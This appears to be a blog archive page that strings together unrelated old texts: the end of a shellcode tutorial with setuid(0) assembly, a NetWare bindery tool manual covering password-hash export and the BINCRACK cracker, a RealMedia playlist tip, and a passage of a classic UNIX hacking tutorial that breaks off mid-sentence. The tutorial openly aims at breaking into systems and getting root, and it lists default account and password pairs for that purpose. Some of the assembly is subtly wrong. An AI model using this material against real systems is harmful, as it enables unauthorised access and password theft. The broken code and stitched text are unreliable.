This will load the value 17 into eax, and clear all of the extraneous bits of eax. This occurs because the leal instruction loads a variable of the type long into it's desitination operand. In it's normal usage, this would load the address of a variable into a register, thus creating a pointer of sorts. However, since ecx is 0'd and 0+17=17, we load the value 17 into eax instead of any kind of actual address. In a normal shellcode we would do something like this, to accomplish the same thing:

xorl %eax,%eax
movb $0x10,%eax

I can hear you saying, but that shellcode is a byte shorter than the leal one, and you're quite right. However, in a real shellcode you may already have to 0 out a register like ecx(or any other register), so the xorl instruction in the leal shellcode isn't counted. Here's an example:

xorl %eax,%eax
xorl %ebx,%ebx
movb $0x17,%al
int $0x80

xorl %ebx,%ebx
leal 0x17(%ebx),%al
int $0x80

Both of these shellcodes call setuid(0), but one does it in 7 bytes while the other does it in 8. Again, I hear you saying but that's only one byte it doesn't make that much of a difference, and you're right, here it doesn't make much of a difference(except for in shellcode-size pissing contests =p), but when applied to much larger shellcodes, which have many function calls and need to do things like this frequently, it can save quite a bit of space.

Conclusion

I hope you all learned something, and will go out and apply your knowledge to create smaller and better shellcodes. If you know who invented the leal technique, please tell me and I will credit him/her.

Accessing the bindery files directly

2009-11-03T02:27:00.001-08:00

3 November 1995

Accessing the bindery files directly

Alastair Grant, Cambridge University

1. Introduction

This document describes a command for accessing the NetWare 3.x bindery
files directly, bypassing the NetWare network API calls.

It can be used for fast bindery access, bulk user management, bypassing
security restrictions, investigating problems etc.

It is quite possible to destroy the bindery completely, or to reveal
information which could be used by hackers to obtain passwords. Users
are assumed to have a basic grasp of good procedures for security and
backup.

2. Command syntax

The basic format of the command is

bindery [options] bindery-spec action action ...

2.1 Specifying a bindery

A bindery specification takes the form

path/.extension

E.g. SYS:SYSTEM/.SYS. The path defaults to the current directory. The
extension defaults to .OLD.

Alternatively an 'active' bindery can be specified:

SERVER server

The bindery will be closed if necessary.

2.2 Actions on the bindery

INFO print info about the bindery
SCHEMA checks the bindery against the schema in BINDERY.SCH
DUMP obj dump all information for the specified object(s)
OBJ list all object records
PROP list all property records
VAL list all value records
VALDATA list all value records, with data
EXPORT export the bindery to a text file; see below
IMPORT import the bindery from a text file
ETC export user password information, suitable for input to the
password-cracking program described below

The following actions apply only if a bindery has been specified by the
SERVER parameter:
CLOSE close the bindery, i.e. make it available for direct access;
users attempting to access the bindery via NetWare API calls
will receive an error
OPEN open the bindery, which causes the server to reload it and
may take some time for large binderies
COPY directory
copy the bindery files into a directory elsewhere

3. Export/import

The bindery can be exported to and imported from a text file. This can
be used for various purposes:

- problem diagnosis and repair

- creation of large binderies given a set of user information

- compaction of binderies

- merging binderies or moving users between binderies while
preserving their passwords

To see the format of the export file, try exporting a small bindery.

4. Password cracking

Passwords are not stored in clear in the bindery. What is stored is a
16-byte value computed via a one-way function from the user's object id
and the password. Given the object id and password it is possible to
generate a candidate password which can be compared against that in the
bindery.

The ETC option of the BINDERY command produces a file containing the
required information, in a format superficially similar to /etc/passwd
on Unix:

userid:pw-hash:object-id:pw-len:name::

e.g.

ttidy:32d8998e098a05830f809b809ea02137:D0000001:8:Terry Tidy

This can then be input into bindery cracking programs. Separating the
functions in this way allows various forms of parallelism:

- the password file can be split into smaller chunks

- the same password file can be worked on by several cracking
programs each with different dictionaries or algorithms

- cracking programs can be run on faster machines

A cracking program BINCRACK is provided which takes such a file as
input. It has command syntax:

bincrack [/verify] [/numsub] pw-file dict-file

/verify lists the passwords that are being tried. /numsub tries
substituting numbers for letters, e.g. "1D10T". This takes a lot longer
as all possible combinations are tried. pw-file is an exported bindery
password file. dict-file is a simple word list.

Versions are available for MS-DOS and for Solaris 1 and Solaris 2 SPARC
systems.

Suitable wordlists can be found at

ftp://ftp.ox.ac.uk/pub/wordlists/

A very small tut for RealMedia

2009-11-03T02:23:00.000-08:00

You may find this helpful if you donwload hundreds of short episodes in rm format like me and tired of double-click to open next files.

Very easy. Use notepad to open a new file, type this inside:
file://link to file1
file://link to file2
(type as many as you want)
Close file. Rename it to FileName.rm

Then you`re done!!!!

Ex:
I put my playlist file here: C:\Movies\7VNR
And the movie files are in C:\Movies\7VNR\DragonBall

Then inside my playlist file I`ll have something like this:

file://DragonBall/db134.rm
file://DragonBall/db135.rm
file://DragonBall/db136.rm
file://DragonBall/db137.rm
file://DragonBall/db138.rm

A UNIX Hacking Tutorial

2009-11-03T02:22:00.002-08:00

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ UNIX : A Hacking Tutorial +
+ By: Sir Hackalot +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

----------------------
o Intent of this file:
----------------------

This phile is geared as an UNIX tutorial at first, to let you get more
familiar with the operating system. UNIX is just an operating system, as
is MS-DOS, AppleDOS, AmigaDOS, and others. UNIX happens to be a multi-user-
multi-tasking system, thus bringing a need for security not found on MSDOS,
AppleDOS, etc. This phile will hopefully teach the beginners who do not have
a clue about how to use UNIX a good start, and may hopefully teach old pros
something they didn't know before. This file deals with UNIX SYSTEM V and
its variants. When I talk about unix, its usually about SYSTEM V (rel 3.2).

Where Can I be found? I have no Idea. The Boards today are going Up'n'Down
so fast, 3 days after you read this file, if I put a BBS in it where you could
reach me, it may be down! Just look for me.

I can be reached on DarkWood Castle [If it goes back up], but that board
is hard to get access on, but I decided to mention it anyway.

I *COULD* Have been reached on jolnet, but......

This file may have some bad spelling, etc, or discrepencies since it was
spread out over a long time of writing, because of school, work, Girl friend,
etc. Please, no flames. If you don't like this file, don't keep it.

This is distributed under PHAZE Inc. Here are the members (and ex ones)
The Dark Pawn
The Data Wizard
Sir Hackalot (Me)
Taxi (ummm.. Busted)
Lancia (Busted)
The British Knight (Busted)
The Living Pharoah (Busted)

_____________________________________________________________________________

-------------
o Dedication:
-------------
This phile is dedicated to the members of LOD that were raided in
Atlanta. The members that got busted were very good hackers, especially
The Prophet. Good luck to you guys, and I hope you show up again somewhere.
_____________________________________________________________________________

------------------------
o A little History, etc:
------------------------

UNIX, of course, was invented By AT&T in the 60's somewhere, to be
"a programmer's operating system." While that goal was probably not reached
when they first invented UNIX, it seems that now, UNIX is a programmer's OS.
UNIX, as I have said before, is a multi-tasking/multi-user OS. It is also
written in C, or at least large parts of it are, thus making it a portable
operating system. We know that MSDOS corresponds to IBM/clone machines,
right? Well, this is not the case with UNIX. We do not associate it with
any one computer since it has been adapted for many, and there are many
UNIX variants [that is, UNIX modified by a vendor, or such]. Some AT&T
computers run it, and also some run MSDOS [AT&T 6300]. The SUN workstations
run SunOS, a UNIX variant, and some VAX computers run Ultrix, a VAX version
of UNIX. Remember, no matter what the name of the operating system is [BSD,
UNIX,SunOS,Ultrix,Xenix, etc.], they still have a lot in common, such as the
commands the operating system uses. Some variants may have features others
do not, but they are basically similar in that they have a lot of the same
commands/datafiles. When someone tries to tell you that UNIX goes along with
a certain type of computer, they may be right, but remember, some computers
have more than one Operating system. For instance, one person may tell you
that UNIX is to a VAX as MSDOS is to IBM/clones. That is untrue, and the
only reason I stated that, was because I have seen many messages with info
/comparisons in it like that, which confuse users when they see a VAX running
VMS.
____________________________________________________________________________

-------------------------------
o Identifying a Unix/Logging in
-------------------------------

From now on, I will be referring to all the UNIX variants/etc as
UNIX, so when I say something about UNIX, it generally means all the variants
(Unix System V variants that is: BSD, SunOS, Ultrix, Xenix, etc.), unless
I state a variant in particular.

Okay. Now its time for me to tell you how a unix USUALLY greets you.
First, when you call up a UNIX, or connect to one however you do, you will
usually get this prompt:

login:

Ok. Thats all fine and dandy. That means that this is PROBABLY a Unix,
although there are BBS's that can mimic the login procedure of an OS
(Operating System), thus making some people believe its a Unix. [Hah!].
Some Unixes will tell you what they are or give you a message before a
login: prompt, as such:

Welcome to SHUnix. Please log in.

login:

Or something like that. Public access Unixes [like Public BBSs] will
tell you how to logon if you are a new users. Unfortunatly, this phile is
not about public access Unixes, but I will talk about them briefly later, as
a UUCP/UseNet/Bitnet address for mail.
OK. You've gotten to the login prompt! Now, what you need to do
here is enter in a valid account. An Account usually consists of 8 characters
or less. After you enter in an account, you will probably get a password
prompt of some sort. The prompts may vary, as the source code to the login
program is usually supplied with UNIX, or is readily available for free.
Well, The easiest thing I can say to do to login is basically this:
Get an account, or try the defaults. The defaults are ones that came with
the operating system, in standard form. The list of some of the Defaults
are as follows:

ACCOUNT PASSWORD
------- --------
root root - Rarely open to hackers
sys sys / system / bin
bin sys / bin
mountfsys mountfsys
adm adm
uucp uucp
nuucp anon
anon anon
user user
games games
install install
reboot * See Below
demo demo
umountfsys umountfsys
sync sync
admin admin
guest guest
daemon daemon

The accounts root, mountfsys, umountfsys, install, and sometimes sync are
root level accounts, meaning they have sysop power, or total power. Other
logins are just "user level" logins meaning they only have power over what
files/processes they own. I'll get into that later, in the file permissions
section. The REBOOT login is what as known as a command login, which just
simply doesn't let you into the operating system, but executes a program
assigned to it. It usually does just what it says, reboot the system. It
may not be standard on all UNIX systems, but I have seen it on UNISYS unixes
and also HP/UX systems [Hewlett Packard Unixes]. So far, these accounts have
not been passworded [reboot], which is real stupid, if you ask me.

COMMAND LOGINS:
---------------

There are "command logins", which, like reboot, execute a command then log
you off instead of letting you use the command interpreter. BSD is notorious
for having these, and concequently, so does MIT's computers. Here are some:

rwho - show who is online
finger - same
who - same

These are the most useful, since they will give the account names that are
online, thus showing you several accounts that actually exist.

Errors:
-------

When you get an invalid Account name / invalid password, or both, you will
get some kind of error. Usually it is the "login incorrect" message. When
the computer tells you that, you have done something wrong by either enterring
an invalid account name, or a valid account name, but invalid password. It
does not tell you which mistake you made, for obvious reasons. Also,
when you login incorrectly, the error log on the system gets updated, letting
the sysops(s) know something is amiss.

Another error is "Cannot change to home directory" or "Cannot Change
Directory." This means that no "home directory" which is essentially the
'root' directory for an account, which is the directory you start off in.
On DOS, you start in A:\ or C:\ or whatever, but in UNIX you start in
/homedirectory. [Note: The / is used in directories on UNIX, not a \ ].
Most systems will log you off after this, but some tell you that they will
put you in the root directory [ '/'].

Another error is "No Shell". This means that no "shell" was defined
for that particular account. The "shell" will be explained later. Some
systems will log you off after this message. Others will tell you that they
will use the regular shell, by saying "Using the bourne shell", or "Using sh"

-----------------------------
Accounts In General :
-----------------------------

This section is to hopefully describe to you the user structure
in the UNIX environment.
Ok, think of UNIX having two levels of security: absolute power,
or just a regular user. The ones that have absolute power are those users
at the root level. Ok, now is the time to think in numbers. Unix associates
numbers with account names. each account will have a number. Some will have
the same number. That number is the UID [user-id] of the account. the root
user id is 0. Any account that has a user id of 0 will have root access.
Unix does not deal with account names (logins) but rather the number
associated with them. for instance, If my user-id is 50, and someone else's
is 50, with both have absolute power of each other, but no-one else.
_____________________________________________________________________________

---------------
Shells :
---------------

A shell is an executable program which loads and runs when a user
logs on, and is in the foreground. This "shell" can be any executable prog-
ram, and it is defined in the "passwd" file which is the userfile. Each
login can have a unique "shell". Ok. Now the shell that we usually will work
with is a command interpreter. A command interpreter is simply something
like MSDOS's COMMAND.COM, which processes commands, and sends them to the
kernel [operating system]. A shell can be anything, as I said before,
but the one you want to have is a command interpreter. Here are the
usual shells you will find:

sh - This is the bourne shell. It is your basic Unix "COMMAND.COM". It has
a "script" language, as do most of the command interpreters on Unix sys-
tems.

csh - This is the "C" shell, which will allow you to enter "C" like commands.
ksh - this is the korn shell. Just another command interpreter.
tcsh - this is one, which is used at MIT I believe. Allows command editing.
vsh - visual shell. It is a menu driven deal. Sorta like.. Windows for DOS
rsh - restricted shell OR remote shell. Both Explained later.
There are many others, including "homemade " shells, which are
programs written by the owner of a unix, or for a specific unix, and they
are not standard. Remember, the shell is just the program you get to use
and when it is done executing, you get logged off. A good example of a
homemade shell is on Eskimo North, a public access Unix. The shell
is called "Esh", and it is just something like a one-key-press BBS,
but hey, its still a shell. The Number to eskimo north is 206-387-3637.
[206-For-Ever]. If you call there, send Glitch Lots of mail.
Several companies use Word Processors, databases, and other things
as a user shell, to prevent abuse, and make life easier for unskilled computer
operators. Several Medical Hospitals use this kind of shell in Georgia,
and fortunatly, these second rate programs leave major holes in Unix.
Also, a BBS can be run as a shell. Check out Jolnet [312]-301-2100, they
give you a choice between a command interpreter, or a BBS as a shell.
WHen you have a command interpreter, the prompt is usually a:
$
when you are a root user the prompt is usually a:
#
The variable, PS1, can be set to hold a prompt.
For instance, if PS1 is "HI:", your prompt will be:
HI:

_____________________________________________________________________________

------------------------
SPecial Characters, ETc:
------------------------

Control-D : End of file. When using mail or a text editor, this will end
the message or text file. If you are in the shell and hit control-d you get
logged off.

Control-J: On some systems, this is like the enter key.
@ : Is sometimes a "null"
? : This is a wildcard. This can represent a letter. If you specified
something at the command line like "b?b" Unix would look for bob,bib,bub,
and every other letter/number between a-z, 0-9.
* : this can represent any number of characters. If you specified a "hi*"
it would use "hit", him, hiiii, hiya, and ANYTHING that starts with
hi. "H*l" could by hill, hull, hl, and anything that starts with an
H and ends with an L.

[] - The specifies a range. if i did b[o,u,i]b unix would think: bib,bub,bob
if i did: b[a-d]b unix would think: bab,bbb,bcb,bdb. Get the idea? The
[], ?, and * are usually used with copy, deleting files, and directory
listings.

EVERYTHING in Unix is CASE sensitive. This means "Hill" and "hill" are not
the same thing. This allows for many files to be able to be stored, since
"Hill" "hill" "hIll" "hiLl", etc. can be different files. So, when using
the [] stuff, you have to specify capital letters if any files you are dealing
with has capital letters. Most everything is lower case though.

----------------
Commands to use:
----------------

Now, I will rundown some of the useful commands of Unix. I will act
as if I were typing in the actual command from a prompt.

ls - this is to get a directory. With no arguments, it will just print out
file names in either one column or multi-column output, depending on the
ls program you have access to.

example:
$ ls
hithere
runme
note.text
src
$
the -l switch will give you extended info on the files.
$ ls -l
rwx--x--x sirhack sirh 10990 runme
and so on....

the "rwx--x--x" is the file permission. [Explained Later]
the "sirhack sirh" is the owner of the file/group the file is in.
sirhack = owner, sirh = user-group the file is in [explained later]
the 10990 is the size of the file in bytes.
"runme" is the file name.
The format varies, but you should have the general idea.

cat - this types out a file onto the screen. should be used on text files.
only use it with binary files to make a user mad [explained later]
ex:
$ cat note.txt
This is a sample text file!
$

cd - change directory . You do it like this: cd /dir/dir1/dir2/dirn.
the dir1/etc.... describes the directory name. Say I want to get
to the root directory.
ex:
$ cd /
*ok, I'm there.*
$ ls
bin
sys
etc
temp
work
usr
all of the above are directories, lets say.
$ cd /usr
$ ls
sirhack
datawiz
prophet
src
violence
par
phiber
scythian
$ cd /usr/sirhack
$ ls
hithere
runme
note.text
src
$
ok, now, you do not have to enter the full dir name. if you are in
a directory, and want to get into one that is right there [say "src"], you
can type "cd src" [no "/"]. Instead of typing "cd /usr/sirhack/src" from the
sirhack dir, you can type "cd src"

cp - this copies a file. syntax for it is "cp fromfile tofile"
$ cp runme runme2
$ ls
hithere
runme
note.text
src
runme2
Full pathnames can be included, as to copy it to another directory.
$ cp runme /usr/datwiz/runme

mv - this renames a file. syntax "mv oldname newname"
$ mv runme2 runit
$ ls
hithere
runme
note.text
src
runit
files can be renamed into other directories.
$ mv runit /usr/datwiz/run
$ ls
hithere
runme
note.text
src
$ ls /usr/datwiz
runme
run

pwd - gives current directory
$ pwd
/usr/sirhack
$ cd src
$ pwd
/usr/sirhack/src
$ cd ..
$ pwd
/usr/sirhack
[ the ".." means use the name one directory back. ]
$ cd ../datwiz
[translates to cd /usr/datwiz]
$ pwd
/usr/datwiz
$ cd $home
[goto home dir]
$ pwd
/usr/sirhack

rm - delete a file. syntax "rm filename" or "rm -r directory name"
$ rm note.text
$ ls
hithere
runme
src
$

write - chat with another user. Well, "write" to another user.
syntax: "write username"
$ write scythian
scythian has been notified
Hey Scy! What up??
Message from scythian on tty001 at 17:32
hey!
me: So, hows life?
scy: ok, I guess.
me: gotta go finish this text file.
scy: ok
me: control-D [to exit program]
$

who [w,who,whodo] - print who is online
$ who
login term logontime
scythian + tty001 17:20
phiberO + tty002 15:50
sirhack + tty003 17:21
datawiz - tty004 11:20
glitch - tty666 66:60
$
the "who" commands may vary in the information given. a "+" means
you can "write" to their terminal, a "-" means you cannot.

man - show a manual page entry. syntax "man command name" This is a help
program. If you wanted to know how to use... "who" you'd type
$ man who
WHO(1) xxx......
and it would tell you.

stty - set your terminal characteristics. You WILL have to do "man stty"
since each stty is different, it seems like.
an example would be:
$ stty -parenb
to make the data params N,8,1. A lot of Unixes operate at
e,7,1 by default.

sz,rz - send and recieve via zmodem
rx,sx - send / recieve via xmodem
rb,sb - send via batch ymodem. These 6 programs may or may not be on a unix.
umodem - send/recieve via umodem.
$ sz filename
ready to send...
$ rz filename
please send your file....
...etc..

ed - text editor. Usage "ed filename" to create a file that doesn't
exist, just enter in "ed filename"
some versions of ed will give you a prompt, such as "*" others will not
$ ed newtext
0
* a
This is line 1
This is line 2
[control-z]
* 1 [to see line one]
This is line 1
* a [keep adding]
This is line 3
[control-z]
*0a [add after line 0]
This is THE first line
[control-z]
1,4l
This is THE first line
This is line 1
This is line 2
This is line 3
* w
71
* q
$
The 71 is number of bytes written.
a = append
l = list
# = print line number
w - write
l fname = load fname
s fname = save to fname
w = write to current file
q = quit
mesg - turn write permissions on or off to your terminal (allow chat)
format "mesg y" or "mesg n"
cc - the C compiler. don't worry about this one right now.
chmod - change mode of a file. Change the access in other words.
syntax: "chmod mode filename"
$ chmod a+r newtext
Now everyone can read newtext.
a = all
r = read. This will be explained further in the File System section.

chown - change the owner of a file.
syntax: "chown owner filename"
$ chown scythian newtext
$
chgrp - change the group [explained later] of a file.
syntax: "chgrp group file"
$ chgrp root runme
$
finger - print out basic info on an account. Format: finger username
grep - search for patterns in a file. syntax: "grep pattern file"
$ grep 1 newtext
This is Line 1
$ grep THE newtext
This is THE first line
$ grep "THE line 1" newtext
$

mail - This is a very useful utility. Obviously, you already know what it
is by its name. There are several MAIL utilities, such as ELM, MUSH
and MSH, but the basic "mail" program is called "mail". The usage
is:
"mail username@address" or
"mail username"
or
"mail"
or "mail addr1!addr2!addr3!user"

"mail username@address" - This is used to send mail to someone on
another system, which is usually another UNIX, but some DOS machines and some
VAX machines can recieve Unix Mail. When you use "mail user@address" the
system you are on MUST have a "smart mailer" [known as smail], and must
have what we call system maps. The smart mailer will find the "adress" part
of the command and expand it into the full pathname usually. I could look
like this: mail phiber@optik
then look like this to the computer:

mail sys1!unisys!pacbell!sbell!sc1!att.com!sirhacksys!optik!phiber

Do not worry about it, I was merely explaining the principal of the thing.
Now, if there is no smart mailer online, you'll have to know the FULL path
name of the person you wish to mail to. For Instance, I want to mail to
.. phiber. I'd do this if there were no smart mailer:

$ mail sys!unisys!pacbell!sbell!sc1!att.com!sirhacksys!optik!phiber

Hey Guy. Whats up? Well, gotta go. Nice long message huh?
[control-D]
$
Then, when he got it, there would be about 20 lines of information, with
like a post mark from every system my message went thru, and the "from" line
would look like so:

From optik!sirhacksys!att.com!sc1!sbell!pacbell!unisys!sys!sirhack

Now, for local mailing, just type in "mail username" where username
is the login you want to send mail to. Then type in your message. Then
end it with a control-D.

To read YOUR mail, just type in mail. IE:

$ mail

From scythian ............
To sirhack ............
Subject: Well....

Arghhh!

?
The dots represent omitted crap. Each Mail program makes its own headings.
That ? is a prompt. At this prompt I can type:

d - delete
f username - forward to username
w fname - write message to a file named fname
s fname - save message with header into file
q - quit / update mail
x - quit, but don't change a thing
m username - mail to username
r - reply
[enter] - read next message
+ - go forward one message
- : go back one
h - print out message headers that are in your mailbox.

There are others, to see them, you'd usually hit '?'.

--------

If you send mail to someone not on your system, you will have to wait longer
for a reply, since it is just as a letter. A "postman" has to pick it up.
The system might call out, and use UUCP to transfer mail. Usually, uucp
accounts are no good to one, unless you have uucp available to intercept mail.

ps - process. This command allows you to see what you are actually doing
in memory. Everytime you run a program, it gets assigned a Process Id number
(PID), for accounting purposes, and so it can be tracked in memory, as
well as shut down by you, or root. usually, the first thing in a process
list given by "ps" is your shell name. Say I was logged in under sirhack,
using the shell "csh" and running "watch scythian". The watch program would
go into the background, meaning I'd still be able to do things while it was
running:
$ ps
PID TTY NAME
122 001 ksh
123 001 watch
$
That is a shortened PS. That is the default listing [a brief one].
The TTY column represents the "tty" [i/o device] that the process is being
run from. This is only useful really if you are using layers (don't worry)
or more than one person is logged in with the same account name. Now,
"ps -f" would give a full process listing on yourself, so instead of
seeing just plain ole "watch" you'd most likely see "watch scythian"

kill - kill a process. This is used to terminate a program in memory obvio-
ously. You can only kill processes you own [ones you started], unless you
are root, or your EUID is the same as the process you want to kill.
(Will explain euid later). If you kill the shell process, you are logged
off. By the same token, if you kill someone else's shell process, they
are logged off. So, if I said "kill 122" I would be logged off. However,
kill only sends a signal to UNIX telling it to kill off a process. If
you just use the syntax "kill pid" then UNIX kills the process WHEN it feels
like it, which may be never. So, you can specify urgency! Try "kill -num pid"
Kill -9 pid is a definite kill almost instantly. So if I did this:
$ kill 122
$ kill 123
$ ps
PID TTY NAME
122 001 ksh
123 001 watch
$ kill -9 123
[123]: killed
$ kill -9 122
garbage
NO CARRIER

Also, you can do "kill -1 0" to kill your shell process to log yourself off.
This is useful in scripts (explained later).

-------------------
Shell Programmin'
-------------------

Shell Programming is basically making a "script" file for the
standard shell, being sh, ksh, csh, or something on those lines. Its
like an MSDOS batch file, but more complex, and more Flexible.
This can be useful in one aspect of hacking.

First, lets get into variables. Variables obviously can be assigned
values. These values can be string values, or numberic values.

number=1

That would assign 1 to the variable named "number".

string=Hi There
or
string="Hi There"

Both would assign "Hi there" to a variable.

Using a variable is different though. When you wish to use a variable
you must procede it with a dollar ($) sign. These variables can
be used as arguments in programs. When I said that scripts are
like batch files, I meant it. You can enter in any name of a program
in a script file, and it will execute it. Here is a sample script.

counter=1
arg1="-uf"
arg2="scythian"

ps $arg1 $arg2

echo $counter

That script would translate to "ps -uf scythian" then would print
"1" after that was finished. ECHO prints something on the screen
whether it be numeric, or a string constant.

Other Commands / Examples:

read - reads someting into a variable. format : read variable . No dollar
sign is needed here! If I wwanted to get someone's name, I could
put:

echo "What is your name?"
read hisname
echo Hello $hisname

What is your name?
Sir Hackalot
Hello Sir Hackalot

Remember, read can read numeric values also.

trap - This can watch for someone to use the interrupt character. (Ctrl-c)
format: trap "command ; command ; command ; etc.."
Example:
trap "echo 'Noway!! You are not getting rid o me that easy' ; echo
'You gotta see this through!'"

Now, if I hit control-c during the script after this statement was
executed, I'd get:
Noway!! You are not getting rid of me that easy
You gotta see this through!

exit : format :exit [num] This exists the shell [quits] with return
code of num.

-----
CASE
-----

Case execution is like a menu choice deal. The format of the command
or structure is :
case variable in
1) command;
command;;
2) command;
command;
command;;
*) command;;
esac
Each part can have any number of commands. The last command however
must have a ";;". Take this menu:

echo "Please Choose:"
echo "(D)irectory (L)ogoff (S)hell"
read choice
case $choice in

D) echo "Doing Directory...";
ls -al ;;
L) echo Bye;
kill -1 0;;
S) exit;;
*) Echo "Error! Not a command";;
esac

The esac marks the end of a case function. It must be after the
LAST command.

Loops
-----

Ok, loops. There are two loop functins. the for loops, and the
repeat.

repeat looks like this: repeat something somethin1 somethin2
this would repeat a section of your script for each "something".
say i did this:
repeat scythian sirhack prophet

I may see "scythian" then sirhack then prophet on my screen.

The for loop is defined as "for variable in something
do
..
..
done"

an example:
for counter in 1 2 3
do
echo $counter
done

That would print out 1 then 2 then 3.

Using TEST
----------
The format: Test variable option variable

The optios are:
-eq =
-ne <> (not equal)
-gt >
-lt <
-ge >=
-le <=

for strings its: = for equal != for not equal.

If the condition is true, a zero is returned. Watch:

test 3 -eq 3

that would be test 3 = 3, and 0 would be returned.

EXPR
----

This is for numeric functions. You cannot simply type in
echo 4 + 5
and get an answer most of the time. you must say:
expr variable [or number] operator variable2 [or number]
the operators are:

+ add
- subtract
* multiply
/ divide
^ - power (on some systems)

example : expr 4 + 5
var = expr 4 + 5
var would hold 9.

On some systems, expr sometimes prints out a formula. I mean,
22+12 is not the same as 22 + 12. If you said expr 22+12 you
would see:
22+12
If you did expr 22 + 12 you'd see:
34

SYSTEM VARIABLES
----------------

These are variables used by the shell, and are usually set in the
system wide .profile [explained later].

HOME - location of your home directory.
PS1 - The prompt you are given. usually $ . On BSD its usually &
PATH - This is the search path for programs. When you type in a program
to be run, it is not in memory; it must be loaded off disk. Most commands
are not in Memory like MSDOS. If a program is on the search path, it may
be executed no matter where you are. If not, you must be in the directory
where the program is. A path is a set of directories basically, seperated by
":"'s. Here is a typical search path:

:/bin:/etc:/usr/lbin:$HOME:

When you tried to execute a program, Unix would look for it in /bin,
/etc, /usr/lbin, and your home directory, and if its not found, an error is
spewed out. It searches directories in ORDER of the path. SO if you had a
program named "sh" in your home directory, and typed in "sh", EVEN if
you were in your home dir, it would execute the one in /bin. So, you
must set your paths wisely. Public access Unixes do this for you, but systems
you may encounter may have no path set.

TERM - This is your terminal type. UNIX has a library of functions called
"CURSES" which can take advantage of any terminal, provided the escape
codes are found. You must have your term set to something if you run
screen oriented programs. The escape codes/names of terms are found
in a file called TERMCAP. Don't worry about that. just set your term
to ansi or vt100. CURSES will let you know if it cannot manipulate your
terminal emulation.

-------------------
The C compiler
-------------------

This Will be BRIEF. Why? Becuase if you want to learn C, go
buy a book. I don't have time to write another text file on
C, for it would be huge. Basically, most executables are programmed
in C. Source code files on unix are found as filename.c .
To compile one, type in "cc filename.c". Not all C programs
will compile, since they may depend on other files not there, or
are just modules. If you see a think called "makefile" you can
usually type in just "make" at the command prompt, and something
will be compiled, or be attempted to compile. When using make or
CC, it would be wise to use the background operand since
compiling sometimes takes for ever.
IE:
$ cc login.c&
[1234]
$
(The 1234 was the process # it got identified as).

_____________________________________________________________________________

---------------
The FILE SYSTEM
---------------

This is an instrumental part of UNIX. If you do not understand this
section, you'll never get the hang of hacking Unix, since a lot of Pranks
you can play, and things you can do to "raise your access" depend on it.

First, Let's start out by talking about the directory structure. It is
basically a Hiearchy file system, meaning, it starts out at a root directory
and expands, just as MSDOS, and possibly AmigaDos.

Here is a Directory Tree of sorts: (d) means directory

/ (root dir)
|
|--------------------|
bin (d) usr (d)
----^--------------------
| | |
sirhack(d) scythian (d) prophet (d)
|
src (d)

Now, this particular system contains the following directories:
/
/bin
/usr
/usr/sirhack
/usr/sirhack/src
/usr/scythian
/usr/prophet

Hopefully, you understood that part, and you should. Everything spawns from
the root directory.

o File Permissions!
------------------

Now, this is really the biggie. File Permissions. It is not that hard to
understand file permissions, but I will explain them deeply anyway.

OK, now you must think of user groups as well as user names. Everyone
belongs to a group. at the $ prompt, you could type in 'id' to see what
group you are in. Ok, groups are used to allow people access certain things,
instead of just having one person controlling/having access to certain files.
Remember also, that Unix looks at someone's UID to determine access, not
user name.

Ok. File permissions are not really that complicated. Each file has an owner
This OWNER is usually the one who creates the file, either by copying a file
or just by plain editing one. The program CHOWN can be used to give someone
ownership of a file. Remember that the owner of a file must be the one who
runs CHOWN, since he is the only one that can change the permissions of a file
Also, there is a group owner, which is basically the group that you were in
when the file was created. You would use chgrp to change the group a file is
in.

Now, Files can have Execute permissions, read permissions, or write permission.
If you have execute permission, you know that you can just type in the name
of that program at the command line, and it will execute. If you have read
permission on a file, you can obviously read the file, or do anything that
reads the file in, such as copying the file or cat[ing] it (Typing it).
If you do NOT have access to read a file, you can't do anything that requires
reading in the file. This is the same respect with write permission. Now,
all the permissions are arranged into 3 groups. The first is the owner's
permissions. He may have the permissions set for himself to read and execute
the file, but not write to it. This would keep him from deleting it.
The second group is the group permissions. Take an elongated directory
for an example:
$ ls -l runme
r-xrwxr-- sirhack root 10990 March 21 runme

ok. Now, "root" is the groupname this file is in. "sirhack" is the owner.
Now, if the group named 'root' has access to read, write and execute, they
could do just that. Say .. Scythian came across the file, and was in the root
user group. He could read write or execute the file. Now, say datawiz came
across it, but was in the "users" group. The group permissions would not
apply to him, meaning he would have no permissions, so he couldn't touch
the file, right? Sorta. There is a third group of permissions, and this is
the "other" group. This means that the permissions in the "other" group
apply to everyone but the owner, and the users in the same group as the file.
Look at the directory entry above. the r-x-rwxr-- is the permissions line.
The first three characters are the permissions for the owner (r-x). The
"r-x" translates to "Read and execute permissions, but no write permissions"
the second set of three, r-xRWXr-- (the ones in capital letters) are the group
permissions. Those three characters mean "Read, write, and execution allowed"
The 3rd set, r-xrwxR-- is the permissions for everyone else. It means
"Reading allowed, but nothing else". A directory would look something like
this:
$ ls -l
drwxr-xr-x sirhack root 342 March 11 src

A directory has a "d" at the beggining of the permissions line. Now, the
owner of the directory (sirhack) can read from the directory, write in the
directory, and execute programs from the directory. The root group and every-
one else can only read from the directory, and execute off the directory.
So, If I changed the directory to be executable only, this is
what it would look like:
$ chmod go-r
$ ls
drwx--x--x sirhack root 342 March 11 src

Now, if someone went into the directory besides "sirhack", they could only
execute programs in the directory. If they did an "ls" to get a directory
of src, when they were inside src, it would say "cannot read directory".
If there is a file that is readable in the directory, but the directory is
not readable, it is sometimes possible to read the file anyway.

If you do not have execute permissions in a directory, you won't be able to
execute anything in the directory, most of the time.

_____________________________________________________________________________

--------------
Hacking:
--------------
The first step in hacking a UNIX is to get into the operating system
by finding a valid account/password. The object of hacking is usually to
get root (full privileges), so if you're lucky enough to get in as root,
you need not read anymore of this hacking phile , and get into the
"Having Fun" Section. Hacking can also be just to get other's accounts also.

Getting IN
----------
The first thing to do is to GET IN to the Unix. I mean, get past
the login prompt. That is the very first thing. When you come across a UNIX,
sometimes it will identify itself by saying something like,
"Young INC. Company UNIX"

or Just
"Young Inc. Please login"

Here is where you try the defaults I listed. If you get in with those
you can get into the more advanced hacking (getting root). If you do something
wrong at login, you'll get the message
"login incorrect"
This was meant to confuse hackers, or keep the wondering. Why?
Well, you don't know if you've enterred an account that does not exist, or one
that does exist, and got the wrong password. If you login as root and it says
"Not on Console", you have a problem. You have to login as someone else,
and use SU to become root.

Now, this is where you have to think. If you cannot get in with a
default, you are obviously going to have to find something else to
login as. Some systems provide a good way to do this by allowing the use
